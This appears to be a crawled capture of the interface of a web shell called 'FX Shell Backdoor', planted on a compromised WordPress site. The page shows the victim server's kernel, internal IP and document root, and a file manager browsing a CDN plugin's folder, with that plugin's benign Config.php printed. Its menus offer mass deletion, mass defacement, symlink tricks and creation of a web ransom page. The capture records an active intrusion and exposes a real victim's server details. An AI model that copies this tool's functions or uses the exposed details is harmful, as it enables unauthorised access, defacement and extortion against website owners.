FX Shell Backdoor
Home
Tools
Mass Delete
Mass Deface
Symlink
About
Website : vivehg.com
Ip Address : 172.31.2.149
Port : 443
Kernel : Linux 52-72-122-155.cprapid.com 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
Protokol : HTTP/1.1
Save Data :
Koneksi :
Server : Apache
Root : /home/vivehg/public_html
G-Interface : CGI/1.1
R-Method : GET
Browser : Lainnya
Version Shell : 1.0 (Release candidate)
Author : FierzaXploit/Mr.MF33
Type
Name
options
PATH :
/
home
/
vivehg
/
public_html
/
wp-content
/
plugins
/
bunnycdn
/
src
/
Api
/
Upload
Buat File
Buat Folder
Buat Ransomweb
<?php // bunny.net WordPress Plugin // Copyright (C) 2024 BunnyWay d.o.o. // // This program is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // This program is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with this program. If not, see <http://www.gnu.org/licenses/>. declare(strict_types=1); namespace Bunny\Wordpress\Api; class Config { private ?string $apiKey; public function __construct(?string $apiKey) { $this->apiKey = $apiKey; } public static function fromWpOptions(): self { $apiKey = get_option('bunnycdn_api_key'); if (!is_string($apiKey) || 0 === strlen($apiKey)) { $apiKey = null; } return new Config($apiKey); } public function getApiKey(): ?string { return $this->apiKey; } }
Billing
Choose...
Rename
Delete
Now
Dnszone
Choose...
Rename
Delete
Now
Exception
Choose...
Rename
Delete
Now
Pullzone
Choose...
Rename
Delete
Now
Storagezone
Choose...
Rename
Delete
Now
Billing
Choose...
Edit
Rename
Delete
Now
Client.php
Choose...
Edit
Rename
Delete
Now
Config.php
Choose...
Edit
Rename
Delete
Now
Dnszone
Choose...
Edit
Rename
Delete
Now
Exception
Choose...
Edit
Rename
Delete
Now
Pullzone
Choose...
Edit
Rename
Delete
Now
Storagezone
Choose...
Edit
Rename
Delete
Now
User.php
Choose...
Edit
Rename
Delete
Now